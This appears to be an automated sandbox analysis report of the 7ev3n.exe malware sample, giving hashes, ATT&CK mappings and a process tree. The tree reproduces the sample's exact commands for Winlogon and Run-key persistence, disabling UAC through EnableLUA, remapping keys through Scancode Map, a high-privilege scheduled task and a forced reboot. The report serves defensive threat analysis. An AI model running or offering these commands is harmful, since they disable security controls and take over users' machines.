9c9e87c0c492673453acb1a253c8ae23ee8245531c37d6ef8ead76b6e2d1562e

Reason

Machine shutdown

General

Target

7ev3n.exe
Size

315KB
MD5

9f8bc96c96d43ecb69f883388d228754
SHA1

61ed25a706afa2f6684bb4d64f69c5fb29d20953
SHA256

7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5
SHA512

550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6
SSDEEP

6144:BswDdb2MemnBVlz0SoVbO4A6OA4Trl28TyT6llY1/I8cWJWlfTXv:BswRSslz0P1OdFXJlJ8buXv

Score

10^/10

evasion persistence trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\system.exe"	reg.exe

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

2596 cmd.exe
Executes dropped EXE 1 IoCs

Processes:

system.exe

pid process

1964 system.exe
Loads dropped DLL 2 IoCs

Processes:

7ev3n.exe

pid process

2328 7ev3n.exe
2328 7ev3n.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

pid	process
2596	cmd.exe

pid	process
1964	system.exe

pid	process
2328	7ev3n.exe
2328	7ev3n.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Local\\system.exe"	reg.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

SCHTASKS.exe

pid process

2712 SCHTASKS.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

shutdown.exe

description pid process

Token: SeShutdownPrivilege 680 shutdown.exe
Token: SeRemoteShutdownPrivilege 680 shutdown.exe

pid	process
2712	SCHTASKS.exe

description	pid	process
Token: SeShutdownPrivilege	680	shutdown.exe
Token: SeRemoteShutdownPrivilege	680	shutdown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7ev3n.exesystem.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2328 wrote to memory of 1964	2328	7ev3n.exe	system.exe
PID 2328 wrote to memory of 1964	2328	7ev3n.exe	system.exe
PID 2328 wrote to memory of 1964	2328	7ev3n.exe	system.exe
PID 2328 wrote to memory of 1964	2328	7ev3n.exe	system.exe
PID 1964 wrote to memory of 2596	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2596	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2596	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2596	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2712	1964	system.exe	SCHTASKS.exe
PID 1964 wrote to memory of 2712	1964	system.exe	SCHTASKS.exe
PID 1964 wrote to memory of 2712	1964	system.exe	SCHTASKS.exe
PID 1964 wrote to memory of 2712	1964	system.exe	SCHTASKS.exe
PID 1964 wrote to memory of 2928	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2928	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2928	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2928	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2592	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2592	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2592	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2592	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2156	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2156	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2156	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2156	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2752	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2752	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2752	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2752	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2708	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2708	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2708	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2708	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2632	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2632	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2632	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 2632	1964	system.exe	cmd.exe
PID 2592 wrote to memory of 2528	2592	cmd.exe	reg.exe
PID 2592 wrote to memory of 2528	2592	cmd.exe	reg.exe
PID 2592 wrote to memory of 2528	2592	cmd.exe	reg.exe
PID 2592 wrote to memory of 2528	2592	cmd.exe	reg.exe
PID 2928 wrote to memory of 1316	2928	cmd.exe	reg.exe
PID 2928 wrote to memory of 1316	2928	cmd.exe	reg.exe
PID 2928 wrote to memory of 1316	2928	cmd.exe	reg.exe
PID 2928 wrote to memory of 1316	2928	cmd.exe	reg.exe
PID 2156 wrote to memory of 2072	2156	cmd.exe	reg.exe
PID 2156 wrote to memory of 2072	2156	cmd.exe	reg.exe
PID 2156 wrote to memory of 2072	2156	cmd.exe	reg.exe
PID 2156 wrote to memory of 2072	2156	cmd.exe	reg.exe
PID 2752 wrote to memory of 2516	2752	cmd.exe	reg.exe
PID 2752 wrote to memory of 2516	2752	cmd.exe	reg.exe
PID 2752 wrote to memory of 2516	2752	cmd.exe	reg.exe
PID 2752 wrote to memory of 2516	2752	cmd.exe	reg.exe
PID 2632 wrote to memory of 2272	2632	cmd.exe	reg.exe
PID 2632 wrote to memory of 2272	2632	cmd.exe	reg.exe
PID 2632 wrote to memory of 2272	2632	cmd.exe	reg.exe
PID 2632 wrote to memory of 2272	2632	cmd.exe	reg.exe
PID 2708 wrote to memory of 2060	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 2060	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 2060	2708	cmd.exe	reg.exe
PID 2708 wrote to memory of 2060	2708	cmd.exe	reg.exe
PID 1964 wrote to memory of 1260	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 1260	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 1260	1964	system.exe	cmd.exe
PID 1964 wrote to memory of 1260	1964	system.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\7ev3n.exe
"C:\Users\Admin\AppData\Local\Temp\7ev3n.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2328

C:\Users\Admin\AppData\Local\system.exe
"C:\Users\Admin\AppData\Local\system.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\del.bat
3⤵
- Deletes itself
PID:2596

C:\Windows\SysWOW64\SCHTASKS.exe
C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:2712

C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
3⤵
- Suspicious use of WriteProcessMemory
PID:2928

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
4⤵
- Modifies WinLogon for persistence
PID:1316

C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
3⤵
- Suspicious use of WriteProcessMemory
PID:2592

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
4⤵
- Adds Run key to start application
PID:2528

C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
3⤵
- Suspicious use of WriteProcessMemory
PID:2156

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
4⤵
PID:2072

C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
3⤵
- Suspicious use of WriteProcessMemory
PID:2752

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
4⤵
PID:2516

C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
3⤵
- Suspicious use of WriteProcessMemory
PID:2708

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
4⤵
PID:2060

C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
3⤵
- Suspicious use of WriteProcessMemory
PID:2632

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
4⤵
- UAC bypass
PID:2272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
3⤵
PID:1260

C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
4⤵
PID:2200

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
3⤵
PID:1820

C:\Windows\SysWOW64\shutdown.exe
shutdown -r -t 10 -f
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:680

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:1860

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:2112

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Boot or Logon Autostart Execution

2

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Winlogon Helper DLL

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

2

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Winlogon Helper DLL

1

T1547.004

Abuse Elevation Control Mechanism

1

T1548

Bypass User Account Control

Scheduled Task/Job

Defense Evasion

Modify Registry

3

T1112

Abuse Elevation Control Mechanism

1

T1548

Bypass User Account Control

1

T1548.002

Impair Defenses

1

T1562

Disable or Modify Tools

1

T1562.001

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\del.bat
Filesize
65B

MD5
f727ee128a7eeb23b9c3242b049e61ef

SHA1
a260ee1e7c05377830130163737c7609598d61ee

SHA256
98bfdb556f8e8a2564cadfd0c62fff7b81b3a70a4f7e03a86f704fabd5d3c884

SHA512
c59a537dbd2349d0f29b6596d35c387fbb76a2cde16fddee04c3d861221c2a7a9ef1af67577a63a80523ec4fc079cc64090e3e86544730bf9cdac2ca122a9c0e

Download Submit
\Users\Admin\AppData\Local\system.exe
Filesize
315KB

MD5
960210c40a73291e4349cb16c26afc66

SHA1
e90335ab561ca12801b22e15446c84f90ab53588

SHA256
fef8a83f4105221a01de09749072671b2c6c944a5d52c15d0852cc9a4b6c4890

SHA512
44a42cc7a5baab876e3a7fce4d9d05839de666577306985d8d5920f38f0150ce335c351eaa4d8f834b43abfcb26eb3aa06fbb467dc56695eacd35ad11d8a259a

Download Submit
memory/1860-105-0x0000000002D90000-0x0000000002D91000-memory.dmp

Filesize
4KB

Download
memory/2112-106-0x0000000002B30000-0x0000000002B31000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads